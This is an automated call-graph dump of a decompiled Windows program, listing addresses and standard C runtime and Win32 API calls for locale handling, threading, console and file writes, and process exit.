21088->21090 21091 ab96f5 __Getctype 14 API calls 21089->21091 21090->21087 21094 ab9a04 21091->21094 21092->21093 21093->21077 21093->21079 21095 ab8a3f ___free_lconv_mon 14 API calls 21094->21095 21095->21077 21097 ac014e __strnicoll 43 API calls 21096->21097 21098 ac0023 21097->21098 21119 abfd79 21098->21119 21101 ac003c 21101->21024 21102 ab9c27 __fread_nolock 15 API calls 21103 ac004d 21102->21103 21104 ac0055 21103->21104 21105 ac0063 21103->21105 21107 ab8a3f ___free_lconv_mon 14 API calls 21104->21107 21126 ac0249 21105->21126 21107->21101 21109 ac009b 21110 ab2fbd __strnicoll 14 API calls 21109->21110 21111 ac00a0 21110->21111 21115 ab8a3f ___free_lconv_mon 14 API calls 21111->21115 21112 ac00b6 21113 ac00e2 21112->21113 21118 ab8a3f ___free_lconv_mon 14 API calls 21112->21118 21114 ac012b 21113->21114 21137 abfc6b 21113->21137 21117 ab8a3f ___free_lconv_mon 14 API calls 21114->21117 21115->21101 21117->21101 21118->21113 21120 ab5581 __strnicoll 43 API calls 21119->21120 21121 abfd8b 21120->21121 21122 abfd9a GetOEMCP 21121->21122 21123 abfdac 21121->21123 21124 abfdc3 21122->21124 21123->21124 21125 abfdb1 GetACP 21123->21125 21124->21101 21124->21102 21125->21124 21127 abfd79 45 API calls 21126->21127 21128 ac0269 21127->21128 21130 ac02a6 IsValidCodePage 21128->21130 21135 ac02e2 codecvt 21128->21135 21129 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21131 ac0090 21129->21131 21132 ac02b8 21130->21132 21130->21135 21131->21109 21131->21112 21133 ac02e7 GetCPInfo 21132->21133 21136 ac02c1 codecvt 21132->21136 21133->21135 21133->21136 21135->21129 21135->21135 21145 abfe4d 21136->21145 21138 abfc77 ___scrt_is_nonwritable_in_current_image 21137->21138 21198 ab3011 EnterCriticalSection 21138->21198 21140 abfc81 21199 abfcb8 21140->21199 21146 abfe75 GetCPInfo 21145->21146 21155 abff3e 21145->21155 21151 abfe8d 21146->21151 21146->21155 21147 abec39 std::_Locinfo::_Locinfo_dtor 46 API calls 21150 abfef5 21147->21150 21148 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21149 abfff7 21148->21149 21149->21135 21156 abef30 21150->21156 21151->21147 21154 abef30 47 API calls 21154->21155 21155->21148 21157 ab5581 __strnicoll 43 API calls 21156->21157 21158 abef43 21157->21158 21161 abed42 21158->21161 21162 abed5d __strnicoll 21161->21162 21163 abf0c2 __strnicoll MultiByteToWideChar 21162->21163 21167 abeda3 21163->21167 21164 abef1b 21165 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21164->21165 21166 abef2e 21165->21166 21166->21154 21167->21164 21168 ab9c27 __fread_nolock 15 API calls 21167->21168 21170 abedc9 __alloca_probe_16 21167->21170 21177 abee4f 21167->21177 21168->21170 21169 aaad7d __freea 14 API calls 21169->21164 21171 abf0c2 __strnicoll MultiByteToWideChar 21170->21171 21170->21177 21172 abee0e 21171->21172 21172->21177 21189 ab9129 21172->21189 21175 abee78 21178 abef03 21175->21178 21181 ab9c27 __fread_nolock 15 API calls 21175->21181 21182 abee8a __alloca_probe_16 21175->21182 21176 abee40 21176->21177 21180 ab9129 std::_Locinfo::_Locinfo_dtor 6 API calls 21176->21180 21177->21169 21179 aaad7d __freea 14 API calls 21178->21179 21179->21177 21180->21177 21181->21182 21182->21178 21183 ab9129 std::_Locinfo::_Locinfo_dtor 6 API calls 21182->21183 21184 abeecd 21183->21184 21184->21178 21195 abf13e 21184->21195 21186 abeee7 21186->21178 21187 abeef0 21186->21187 21188 aaad7d __freea 14 API calls 21187->21188 21188->21177 21190 ab8c1b std::_Locinfo::_Locinfo_dtor 5 API calls 21189->21190 21191 ab9134 21190->21191 21192 ab9186 __strnicoll 5 API calls 21191->21192 21193 ab913a 21191->21193 21194 ab917a LCMapStringW 21192->21194 21193->21175 21193->21176 21193->21177 21194->21193 21197 abf155 WideCharToMultiByte 21195->21197 21197->21186 21198->21140 21209 ab3b65 21199->21209 21201 abfcda 21202 ab3b65 __fread_nolock 43 API calls 21201->21202 21203 abfcf9 21202->21203 21204 abfc8e 21203->21204 21205 ab8a3f ___free_lconv_mon 14 API calls 21203->21205 21206 abfcac 21204->21206 21205->21204 21223 ab3059 LeaveCriticalSection 21206->21223 21208 abfc9a 21208->21114 21210 ab3b76 21209->21210 21219 ab3b72 codecvt 21209->21219 21211 ab3b7d 21210->21211 21214 ab3b90 codecvt 21210->21214 21212 ab2fbd __strnicoll 14 API calls 21211->21212 21213 ab3b82 21212->21213 21215 ab2ebf __strnicoll 43 API calls 21213->21215 21216 ab3bbe 21214->21216 21217 ab3bc7 21214->21217 21214->21219 21215->21219 21218 ab2fbd __strnicoll 14 API calls 21216->21218 21217->21219 21221 ab2fbd __strnicoll 14 API calls 21217->21221 21220 ab3bc3 21218->21220 21219->21201 21222 ab2ebf __strnicoll 43 API calls 21220->21222 21221->21220 21222->21219 21223->21208 21225 ab6688 21224->21225 21226 ab6659 21224->21226 21227 ab669f 21225->21227 21228 ab8a3f ___free_lconv_mon 14 API calls 21225->21228 21226->21063 21229 ab8a3f ___free_lconv_mon 14 API calls 21227->21229 21228->21225 21229->21226 21231 aa1210 74 API calls 21230->21231 21232 ac9a24 21231->21232 21233 aa5030 49 API calls 21232->21233 21234 ac9a2e 21233->21234 21235 aa5240 76 API calls 21234->21235 21236 ac9a34 21235->21236 21237 aab076 std::ios_base::_Init 3 API calls 21236->21237 21238 ac9a3b 21237->21238 21239 aab076 std::ios_base::_Init 3 API calls 21238->21239 21240 ac9a44 21239->21240 21275 aaf87c 21240->21275 21242 ac9a5f 21243 ac9a68 21242->21243 21244 ac9aa3 21242->21244 21246 ac9a6d GetCurrentThreadId 21243->21246 21247 ac9ab0 21243->21247 21296 aa7a74 21244->21296 21249 ac9a76 21246->21249 21250 ac9ab7 21246->21250 21248 aa7a74 std::_Throw_Cpp_error 49 API calls 21247->21248 21248->21250 21290 aaa892 WaitForSingleObjectEx 21249->21290 21251 aa7a74 std::_Throw_Cpp_error 49 API calls 21250->21251 21253 ac9abe 21251->21253 21256 aa7a74 std::_Throw_Cpp_error 49 API calls 21253->21256 21255 ac9a89 21257 ac9ac5 21255->21257 21258 ac9a92 std::ios_base::_Ios_base_dtor 21255->21258 21256->21257 21302 ab21fb 21257->21302 21258->20889 21272 aa121c 21271->21272 21395 ab2116 21272->21395 21276 aaf889 21275->21276 21277 aaf89d 21275->21277 21278 ab2fbd __strnicoll 14 API calls 21276->21278 21308 aaf82c 21277->21308 21280 aaf88e 21278->21280 21282 ab2ebf __strnicoll 43 API calls 21280->21282 21284 aaf899 21282->21284 21283 aaf8b2 CreateThread 21285 aaf8d1 GetLastError 21283->21285 21289 aaf8dd 21283->21289 21333 aaf720 21283->21333 21284->21242 21317 ab2f63 21285->21317 21322 aaf79e 21289->21322 21291 aaa8db 21290->21291 21292 aaa8a9 21290->21292 21291->21253 21291->21255 21293 aaa8b0 GetExitCodeThread 21292->21293 21294 aaa8c6 CloseHandle 21292->21294 21293->21291 21295 aaa8c1 21293->21295 21294->21291 21295->21294 21297 aa7a8a std::_Throw_Cpp_error 21296->21297 21373 aa7994 21297->21373 21303 ab2207 ___scrt_is_nonwritable_in_current_image 21302->21303 21304 ab98c7 __Getctype 43 API calls 21303->21304 21307 ab220c 21304->21307 21305 ab3087 __purecall 43 API calls 21306 ab2236 21305->21306 21307->21305 21309 ab89e2 __Getctype 14 API calls 21308->21309 21310 aaf83d 21309->21310 21311 ab8a3f ___free_lconv_mon 14 API calls 21310->21311 21312 aaf84a 21311->21312 21313 aaf86e 21312->21313 21314 aaf851 GetModuleHandleExW 21312->21314 21315 aaf79e 16 API calls 21313->21315 21314->21313 21316 aaf876 21315->21316 21316->21283 21316->21289 21330 ab2faa 21317->21330 21319 ab2f6e __dosmaperr 21320 ab2fbd __strnicoll 14 API calls 21319->21320 21321 ab2f81 21320->21321 21321->21289 21323 aaf7aa 21322->21323 21324 aaf7ce 21322->21324 21325 aaf7b9 21323->21325 21326 aaf7b0 CloseHandle 21323->21326 21324->21242 21327 aaf7c8 21325->21327 21328 aaf7bf FreeLibrary 21325->21328 21326->21325 21329 ab8a3f ___free_lconv_mon 14 API calls 21327->21329 21328->21327 21329->21324 21331 ab9a18 __strnicoll 14 API calls 21330->21331 21332 ab2faf 21331->21332 21332->21319 21334 aaf72c ___scrt_is_nonwritable_in_current_image 21333->21334 21335 aaf733 GetLastError ExitThread 21334->21335 21336 aaf740 21334->21336 21337 ab98c7 __Getctype 43 API calls 21336->21337 21338 aaf745 21337->21338 21347 ab9bb2 21338->21347 21341 aaf75c 21355 aaf8ff 21341->21355 21348 aaf750 21347->21348 21349 ab9bc4 GetPEB 21347->21349 21348->21341 21352 ab91b7 21348->21352 21349->21348 21350 ab9bd7 21349->21350 21358 ab8ddd 21350->21358 21353 ab8d1a std::_Locinfo::_Locinfo_dtor 5 API calls 21352->21353 21354 ab91d3 21353->21354 21354->21341 21361 aaf7d5 21355->21361 21359 ab8d1a std::_Locinfo::_Locinfo_dtor 5 API calls 21358->21359 21360 ab8df9 21359->21360 21360->21348 21362 ab9a18 __strnicoll 14 API calls 21361->21362 21365 aaf7e0 21362->21365 21363 aaf822 ExitThread 21364 aaf7f9 21367 aaf80c 21364->21367 21368 aaf805 CloseHandle 21364->21368 21365->21363 21365->21364 21370 ab91f2 21365->21370 21367->21363 21369 aaf818 FreeLibraryAndExitThread 21367->21369 21368->21367 21369->21363 21371 ab8d1a std::_Locinfo::_Locinfo_dtor 5 API calls 21370->21371 21372 ab920b 21371->21372 21372->21364 21374 aa79a0 __EH_prolog3_GS 21373->21374 21383 aa27d0 21374->21383 21377 aa14d0 std::_Throw_Cpp_error 49 API calls 21378 aa79c9 21377->21378 21387 aa26d0 21378->21387 21380 aa79d1 21392 aab33c 21380->21392 21384 aa27f1 21383->21384 21384->21384 21385 aa55e0 std::ios_base::_Init 49 API calls 21384->21385 21386 aa2803 21385->21386 21386->21377 21388 aa26f6 std::ios_base::_Ios_base_dtor 21387->21388 21389 aa26db 21387->21389 21388->21380 21389->21388 21390 ab2ecf std::ios_base::_Init 43 API calls 21389->21390 21391 aa271a 21390->21391 21393 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21392->21393 21394 aab346 21393->21394 21394->21394 21396 ab212a _Fputc 21395->21396 21397 ab214c 21396->21397 21399 ab2173 21396->21399 21398 ab2e42 _Fputc 43 API calls 21397->21398 21400 ab2167 21398->21400 21404 aaf956 21399->21404 21402 ab0740 _Fputc 43 API calls 21400->21402 21403 aa1237 21402->21403 21403->20892 21405 aaf962 ___scrt_is_nonwritable_in_current_image 21404->21405 21412 aaf6f8 EnterCriticalSection 21405->21412 21407 aaf970 21413 ab07ba 21407->21413 21412->21407 21427 abac00 21413->21427 21415 ab07e1 21434 ab0ab4 21415->21434 21422 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21423 aaf97d 21422->21423 21424 aaf9a5 21423->21424 21797 aaf70c LeaveCriticalSection 21424->21797 21426 aaf98e 21426->21400 21456 ababc5 21427->21456 21429 abac11 21430 abac74 21429->21430 21431 ab9c27 __fread_nolock 15 API calls 21429->21431 21430->21415 21432 abac6b 21431->21432 21433 ab8a3f ___free_lconv_mon 14 API calls 21432->21433 21433->21430 21478 ab1e96 21434->21478 21437 ab0add 21439 ab2e42 _Fputc 43 API calls 21437->21439 21438 ab0828 21449 ab077c 21438->21449 21439->21438 21442 ab1e20 _Fputc 43 API calls 21444 ab0b08 std::_Locinfo::_Locinfo_dtor 21442->21444 21444->21438 21444->21442 21445 ab0ce5 21444->21445 21484 ab0a3c 21444->21484 21487 ab1040 21444->21487 21521 ab12fc 21444->21521 21446 ab2e42 _Fputc 43 API calls 21445->21446 21447 ab0d01 21446->21447 21448 ab2e42 _Fputc 43 API calls 21447->21448 21448->21438 21450 ab8a3f ___free_lconv_mon 14 API calls 21449->21450 21451 ab078c 21450->21451 21452 abacac 21451->21452 21453 ab0842 21452->21453 21454 abacb7 21452->21454 21453->21422 21454->21453 21699 ab345d 21454->21699 21457 ababd1 21456->21457 21461 ababf2 21457->21461 21462 abab89 21457->21462 21459 ababec 21469 ac4eb5 21459->21469 21461->21429 21463 ababaa 21462->21463 21464 abab95 21462->21464 21463->21459 21465 ab2fbd __strnicoll 14 API calls 21464->21465 21466 abab9a 21465->21466 21467 ab2ebf __strnicoll 43 API calls 21466->21467 21468 ababa5 21467->21468 21468->21459 21470 ac4ecf 21469->21470 21471 ac4ec2 21469->21471 21474 ac4edb 21470->21474 21475 ab2fbd __strnicoll 14 API calls 21470->21475 21472 ab2fbd __strnicoll 14 API calls 21471->21472 21473 ac4ec7 21472->21473 21473->21461 21474->21461 21476 ac4efc 21475->21476 21477 ab2ebf __strnicoll 43 API calls 21476->21477 21477->21473 21479 ab1ec3 21478->21479 21480 ab1ea1 21478->21480 21550 ab1eff 21479->21550 21482 ab2e42 _Fputc 43 API calls 21480->21482 21483 ab0acf 21482->21483 21483->21437 21483->21438 21483->21444 21558 aafcbf 21484->21558 21486 ab0a77 21486->21444 21488 ab105e 21487->21488 21489 ab1047 21487->21489 21490 ab109d 21488->21490 21491 ab2e42 _Fputc 43 API calls 21488->21491 21489->21490 21492 ab1391 21489->21492 21493 ab1320 21489->21493 21490->21444 21494 ab1092 21491->21494 21497 ab1396 21492->21497 21498 ab13e4 21492->21498 21495 ab13be 21493->21495 21496 ab1326 21493->21496 21494->21444 21587 ab0069 21495->21587 21503 ab1363 21496->21503 21506 ab132c 21496->21506 21499 ab13d8 21497->21499 21500 ab1398 21497->21500 21498->21495 21498->21503 21519 ab1348 21498->21519 21604 ab1d40 21499->21604 21504 ab139d 21500->21504 21511 ab133a 21500->21511 21520 ab135c 21503->21520 21568 ab01e6 21503->21568 21504->21495 21505 ab13a2 21504->21505 21509 ab13a7 21505->21509 21510 ab13b5 21505->21510 21508 ab1378 21506->21508 21506->21511 21506->21519 21508->21520 21575 ab1c0a 21508->21575 21509->21520 21579 ab1d23 21509->21579 21583 ab1c9f 21510->21583 21511->21519 21511->21520 21594 ab1a80 21511->21594 21515 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21517 ab1642 21515->21517 21517->21444 21519->21520 21607 aba87b 21519->21607 21520->21515 21522 ab1391 21521->21522 21523 ab1320 21521->21523 21526 ab1396 21522->21526 21527 ab13e4 21522->21527 21524 ab13be 21523->21524 21525 ab1326 21523->21525 21532 ab0069 44 API calls 21524->21532 21531 ab1363 21525->21531 21537 ab132c 21525->21537 21528 ab13d8 21526->21528 21529 ab1398 21526->21529 21527->21524 21527->21531 21548 ab1348 21527->21548 21530 ab1d40 44 API calls 21528->21530 21533 ab139d 21529->21533 21534 ab133a 21529->21534 21530->21548 21539 ab01e6 44 API calls 21531->21539 21549 ab135c 21531->21549 21532->21548 21533->21524 21535 ab13a2 21533->21535 21538 ab1a80 46 API calls 21534->21538 21534->21548 21534->21549 21540 ab13a7 21535->21540 21541 ab13b5 21535->21541 21536 ab1378 21543 ab1c0a 45 API calls 21536->21543 21536->21549 21537->21534 21537->21536 21537->21548 21538->21548 21539->21548 21545 ab1d23 44 API calls 21540->21545 21540->21549 21542 ab1c9f 43 API calls 21541->21542 21542->21548 21543->21548 21544 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21546 ab1642 21544->21546 21545->21548 21546->21444 21547 aba87b _Fputc 45 API calls 21547->21548 21548->21547 21548->21549 21549->21544 21551 ab1f13 21550->21551 21552 ab1f7d 21550->21552 21553 abab89 _Ungetc 43 API calls 21551->21553 21552->21483 21554 ab1f1a 21553->21554 21554->21552 21555 ab2fbd __strnicoll 14 API calls 21554->21555 21556 ab1f72 21555->21556 21557 ab2ebf __strnicoll 43 API calls 21556->21557 21557->21552 21559 ab1e7b std::_Locinfo::_Locinfo_dtor 43 API calls 21558->21559 21560 aafcd1 21559->21560 21561 aafce6 21560->21561 21564 aafd19 21560->21564 21567 aafd01 std::_Locinfo::_Locinfo_dtor 21560->21567 21562 ab2e42 _Fputc 43 API calls 21561->21562 21562->21567 21563 aafdb0 21565 ab1dc7 43 API calls 21563->21565 21564->21563 21566 ab1dc7 43 API calls 21564->21566 21565->21567 21566->21563 21567->21486 21569 ab01fa 21568->21569 21570 ab021c 21569->21570 21572 ab0243 21569->21572 21571 ab2e42 _Fputc 43 API calls 21570->21571 21574 ab0239 21571->21574 21572->21574 21617 aafbdc 21572->21617 21574->21519 21577 ab1c25 21575->21577 21576 ab1c5c 21576->21519 21577->21576 21578 aba87b _Fputc 45 API calls 21577->21578 21578->21576 21580 ab1d2f 21579->21580 21631 aafeec 21580->21631 21582 ab1d3f 21582->21519 21586 ab1cb4 21583->21586 21584 ab2e42 _Fputc 43 API calls 21585 ab1cd5 21584->21585 21585->21519 21586->21584 21586->21585 21588 ab007d 21587->21588 21589 ab009f 21588->21589 21590 ab00c6 21588->21590 21591 ab2e42 _Fputc 43 API calls 21589->21591 21592 aafbdc 15 API calls 21590->21592 21593 ab00bc 21590->21593 21591->21593 21592->21593 21593->21519 21595 ab1a9a 21594->21595 21596 aafbdc 15 API calls 21595->21596 21597 ab1adb 21596->21597 21638 aba6fa 21597->21638 21600 ab1b89 21602 ab1e20 _Fputc 43 API calls 21600->21602 21603 ab1bbc 21600->21603 21601 ab1e20 _Fputc 43 API calls 21601->21600 21602->21603 21603->21519 21603->21603 21605 ab01e6 44 API calls 21604->21605 21606 ab1d55 21605->21606 21606->21519 21608 aba890 21607->21608 21609 aba8d1 21608->21609 21610 ab1e20 _Fputc 43 API calls 21608->21610 21615 aba894 codecvt _Fputc 21608->21615 21616 aba8bd codecvt 21608->21616 21612 abf13e _Fputc WideCharToMultiByte 21609->21612 21609->21615 21609->21616 21610->21609 21611 ab2e42 _Fputc 43 API calls 21611->21615 21613 aba98c 21612->21613 21614 aba9a2 GetLastError 21613->21614 21613->21615 21614->21615 21614->21616 21615->21519 21616->21611 21616->21615 21618 aafc03 21617->21618 21619 aafbf1 21617->21619 21618->21619 21620 ab9c27 __fread_nolock 15 API calls 21618->21620 21619->21574 21621 aafc27 21620->21621 21622 aafc3a 21621->21622 21623 aafc2f 21621->21623 21628 ab0796 21622->21628 21624 ab8a3f ___free_lconv_mon 14 API calls 21623->21624 21624->21619 21627 ab8a3f ___free_lconv_mon 14 API calls 21627->21619 21629 ab8a3f ___free_lconv_mon 14 API calls 21628->21629 21630 aafc45 21629->21630 21630->21627 21632 aaff00 21631->21632 21633 aaff22 21632->21633 21635 aaff49 21632->21635 21634 ab2e42 _Fputc 43 API calls 21633->21634 21637 aaff3f 21634->21637 21636 aafbdc 15 API calls 21635->21636 21635->21637 21636->21637 21637->21582 21639 aba72f 21638->21639 21640 aba70b 21638->21640 21639->21640 21642 aba762 21639->21642 21641 ab2e42 _Fputc 43 API calls 21640->21641 21651 ab1b65 21641->21651 21643 aba7ca 21642->21643 21644 aba79b 21642->21644 21645 aba7f3 21643->21645 21646 aba7f8 21643->21646 21657 aba59e 21644->21657 21649 aba85a 21645->21649 21650 aba820 21645->21650 21665 ab9e36 21646->21665 21692 aba162 21649->21692 21652 aba840 21650->21652 21653 aba825 21650->21653 21651->21600 21651->21601 21685 aba34b 21652->21685 21675 aba4cf 21653->21675 21658 aba5b4 21657->21658 21659 aba5bf 21657->21659 21658->21651 21660 ab88cb ___std_exception_copy 43 API calls 21659->21660 21661 aba61a 21660->21661 21662 aba624 21661->21662 21663 ab2eec __Getctype 11 API calls 21661->21663 21662->21651 21664 aba632 21663->21664 21666 ab9e49 21665->21666 21667 ab9e7a 21666->21667 21668 ab9e58 21666->21668 21670 ab9e94 21667->21670 21672 ab9ee9 21667->21672 21669 ab2e42 _Fputc 43 API calls 21668->21669 21674 ab9e70 __alldvrm codecvt _strrchr 21669->21674 21671 aba162 45 API calls 21670->21671 21671->21674 21673 ab1e20 _Fputc 43 API calls 21672->21673 21672->21674 21673->21674 21674->21651 21676 ac3755 45 API calls 21675->21676 21677 aba4ff 21676->21677 21678 ac365b 43 API calls 21677->21678 21679 aba53d 21678->21679 21680 aba57d 21679->21680 21681 aba556 21679->21681 21683 aba544 21679->21683 21682 aba206 43 API calls 21680->21682 21684 aba3e1 43 API calls 21681->21684 21682->21683 21683->21651 21684->21683 21686 ac3755 45 API calls 21685->21686 21687 aba37a 21686->21687 21688 ac365b 43 API calls 21687->21688 21689 aba3bb 21688->21689 21690 aba3c2 21689->21690 21691 aba3e1 43 API calls 21689->21691 21690->21651 21691->21690 21693 ac3755 45 API calls 21692->21693 21694 aba18c 21693->21694 21695 ac365b 43 API calls 21694->21695 21696 aba1da 21695->21696 21697 aba1e1 21696->21697 21698 aba206 43 API calls 21696->21698 21697->21651 21698->21697 21700 ab3476 21699->21700 21704 ab349d 21699->21704 21701 abab89 _Ungetc 43 API calls 21700->21701 21700->21704 21702 ab3492 21701->21702 21705 abc5e4 21702->21705 21704->21453 21707 abc5f0 ___scrt_is_nonwritable_in_current_image 21705->21707 21706 abc5f8 21706->21704 21707->21706 21708 abc6b4 21707->21708 21710 abc645 21707->21710 21709 ab2e42 _Fputc 43 API calls 21708->21709 21709->21706 21716 ac0a66 EnterCriticalSection 21710->21716 21712 abc64b 21713 abc668 21712->21713 21717 abc6ec 21712->21717 21743 abc6ac 21713->21743 21716->21712 21719 abc711 21717->21719 21741 abc734 __fread_nolock 21717->21741 21718 abc715 21720 ab2e42 _Fputc 43 API calls 21718->21720 21719->21718 21721 abc773 21719->21721 21720->21741 21722 abc78a 21721->21722 21746 abe27d 21721->21746 21749 abc270 21722->21749 21726 abc7da 21728 abc7ee 21726->21728 21729 abc83d WriteFile 21726->21729 21727 abc79a 21730 abc7a1 21727->21730 21731 abc7c4 21727->21731 21734 abc82b 21728->21734 21735 abc7f6 21728->21735 21732 abc85f GetLastError 21729->21732 21729->21741 21730->21741 21756 abc208 21730->21756 21761 abbe36 GetConsoleOutputCP 21731->21761 21732->21741 21789 abc2ee 21734->21789 21736 abc7fb 21735->21736 21737 abc819 21735->21737 21736->21741 21774 abc3c9 21736->21774 21781 abc4b2 21737->21781 21741->21713 21796 ac0a89 LeaveCriticalSection 21743->21796 21745 abc6b2 21745->21706 21747 abe15c __fread_nolock 45 API calls 21746->21747 21748 abe296 21747->21748 21748->21722 21750 ac4eb5 __fread_nolock 43 API calls 21749->21750 21752 abc282 21750->21752 21751 abc2e3 21751->21726 21751->21727 21752->21751 21753 abc2b0 21752->21753 21754 ab1e20 _Fputc 43 API calls 21752->21754 21753->21751 21755 abc2ca GetConsoleMode 21753->21755 21754->21753 21755->21751 21758 abc25f 21756->21758 21760 abc22a 21756->21760 21757 abc261 GetLastError 21757->21758 21758->21741 21759 ac4f24 5 API calls ___scrt_uninitialize_crt 21759->21760 21760->21757 21760->21758 21760->21759 21762 abbea8 21761->21762 21770 abbeaf codecvt 21761->21770 21763 ab1e20 _Fputc 43 API calls 21762->21763 21763->21770 21764 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21765 abc201 21764->21765 21765->21741 21766 abaa1f 44 API calls ___scrt_uninitialize_crt 21766->21770 21767 ac4dad 5 API calls std::_Locinfo::_Locinfo_dtor 21767->21770 21768 abc16c 21768->21764 21768->21768 21769 abf13e _Fputc WideCharToMultiByte 21769->21770 21770->21766 21770->21767 21770->21768 21770->21769 21770->21770 21771 abc0e7 WriteFile 21770->21771 21773 abc127 WriteFile 21770->21773 21771->21770 21772 abc1df GetLastError 21771->21772 21772->21768 21773->21770 21773->21772 21779 abc3d8 ___scrt_uninitialize_crt 21774->21779 21775 abc497 21776 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21775->21776 21778 abc4b0 21776->21778 21777 abc44d WriteFile 21777->21779 21780 abc499 GetLastError 21777->21780 21778->21741 21779->21775 21779->21777 21780->21775 21787 abc4c1 ___scrt_uninitialize_crt 21781->21787 21782 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21783 abc5e2 21782->21783 21783->21741 21784 abf13e _Fputc WideCharToMultiByte 21784->21787 21785 abc5cb GetLastError 21788 abc5c9 21785->21788 21786 abc580 WriteFile 21786->21785 21786->21787 21787->21784 21787->21785 21787->21786 21787->21788 21788->21782 21795 abc2fd ___scrt_uninitialize_crt 21789->21795 21790 abc3ae 21791 aab063 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21790->21791 21792 abc3c7 21791->21792 21792->21741 21793 abc36d WriteFile 21794 abc3b0 GetLastError 21793->21794 21793->21795 21794->21790 21795->21790 21795->21793 21796->21745 21797->21426 21799 ab6990 21798->21799 21807 ab69a1 21798->21807 21809 ab6a2b GetModuleHandleW 21799->21809 21803 ab69df 21803->20869 21816 ab682b 21807->21816 21810 ab6995 21809->21810 21810->21807 21811 ab6a90 GetModuleHandleExW 21810->21811 21812 ab6acf GetProcAddress 21811->21812 21813 ab6ae3 21811->21813 21812->21813 21814 ab6aff 21813->21814 21815 ab6af6 FreeLibrary 21813->21815 21814->21807 21815->21814 21817 ab6837 ___scrt_is_nonwritable_in_current_image 21816->21817 21831 ab3011 EnterCriticalSection 21817->21831 21819 ab6841 21832 ab6878 21819->21832 21821 ab684e 21836 ab686c 21821->21836 21824 ab69fa 21861 ab6a6e 21824->21861 21827 ab6a18 21829 ab6a90 __purecall 3 API calls 21827->21829 21828 ab6a08 GetCurrentProcess TerminateProcess 21828->21827 21830 ab6a20 ExitProcess 21829->21830 21831->21819 21833 ab6884 ___scrt_is_nonwritable_in_current_image 21832->21833 21835 ab68eb __purecall 21833->21835 21839 ab8695 21833->21839 21835->21821 21860 ab3059 LeaveCriticalSection 21836->21860 21838 ab685a 21838->21803 21838->21824 21840 ab86a1 __EH_prolog3 21839->21840 21843 ab83ed 21840->21843 21842 ab86c8 std::ios_base::_Init 21842->21835 21844 ab83f9 ___scrt_is_nonwritable_in_current_image 21843->21844 21851 ab3011 EnterCriticalSection 21844->21851 21846 ab8407 21852 ab85a5 21846->21852 21851->21846 21853 ab85c4 21852->21853 21854 ab8414 21852->21854 21853->21854 21855 ab8a3f ___free_lconv_mon 14 API calls 21853->21855 21856 ab843c 21854->21856 21855->21854 21859 ab3059 LeaveCriticalSection 21856->21859 21858 ab8425 21858->21842 21859->21858 21860->21838 21866 ab9bf6 GetPEB 21861->21866 21864 ab6a78 GetPEB 21865 ab6a04 21864->21865 21865->21827 21865->21828 21867 ab6a73 21866->21867 21868 ab9c10 21866->21868 21867->21864 21867->21865 21870 ab8d9d 21868->21870 21871 ab8d1a std::_Locinfo::_Locinfo_dtor 5 API calls 21870->21871 21872 ab8db9 21871->21872 21872->21867 21874 ab8859 ___scrt_uninitialize_crt 21873->21874 21875 ab8847 21873->21875 21874->20912 21876 ab8855 21875->21876 21878 ab352b 21875->21878 21876->20912 21881 ab33b8 21878->21881 21884 ab32ac 21881->21884 21885 ab32b8 ___scrt_is_nonwritable_in_current_image 21884->21885 21892 ab3011 EnterCriticalSection 21885->21892 21887 ab32c2 ___scrt_uninitialize_crt 21888 ab332e 21887->21888 21893 ab3220 21887->21893 21901 ab334c 21888->21901 21892->21887 21894 ab322c ___scrt_is_nonwritable_in_current_image 21893->21894 21904 aaf6f8 EnterCriticalSection 21894->21904 21896 ab326f 21918 ab32a0 21896->21918 21897 ab3236 ___scrt_uninitialize_crt 21897->21896 21905 ab34c6 21897->21905 21963 ab3059 LeaveCriticalSection 21901->21963 21903 ab333a 21903->21876 21904->21897 21906 ab34db _Fputc 21905->21906 21907 ab34ed 21906->21907 21908 ab34e2 21906->21908 21909 ab345d ___scrt_uninitialize_crt 68 API calls 21907->21909 21910 ab33b8 ___scrt_uninitialize_crt 72 API calls 21908->21910 21911 ab34f7 21909->21911 21917 ab34e8 21910->21917 21913 abab89 _Ungetc 43 API calls 21911->21913 21911->21917 21912 ab0740 _Fputc 43 API calls 21914 ab3525 21912->21914 21915 ab350e 21913->21915 21914->21896 21921 abbdb9 21915->21921 21917->21912 21962 aaf70c LeaveCriticalSection 21918->21962 21920 ab328e 21920->21887 21922 abbdca 21921->21922 21923 abbdd7 21921->21923 21925 ab2fbd __strnicoll 14 API calls 21922->21925 21924 abbe20 21923->21924 21927 abbdfe 21923->21927 21926 ab2fbd __strnicoll 14 API calls 21924->21926 21931 abbdcf 21925->21931 21928 abbe25 21926->21928 21932 abbd17 21927->21932 21930 ab2ebf __strnicoll 43 API calls 21928->21930 21930->21931 21931->21917 21933 abbd23 ___scrt_is_nonwritable_in_current_image 21932->21933 21945 ac0a66 EnterCriticalSection 21933->21945 21935 abbd32 21936 abbd77 21935->21936 21946 ac0b3d 21935->21946 21938 ab2fbd __strnicoll 14 API calls 21936->21938 21940 abbd7e 21938->21940 21939 abbd5e FlushFileBuffers 21939->21940 21941 abbd6a GetLastError 21939->21941 21959 abbdad 21940->21959 21942 ab2faa __dosmaperr 14 API calls 21941->21942 21942->21936 21945->21935 21947 ac0b4a 21946->21947 21948 ac0b5f 21946->21948 21949 ab2faa __dosmaperr 14 API calls 21947->21949 21950 ab2faa __dosmaperr 14 API calls 21948->21950 21952 ac0b84 21948->21952 21951 ac0b4f 21949->21951 21953 ac0b8f 21950->21953 21954 ab2fbd __strnicoll 14 API calls 21951->21954 21952->21939 21955 ab2fbd __strnicoll 14 API calls 21953->21955 21956 ac0b57 21954->21956 21957 ac0b97 21955->21957 21956->21939 21958 ab2ebf __strnicoll 43 API calls 21957->21958 21958->21956 21960 ac0a89 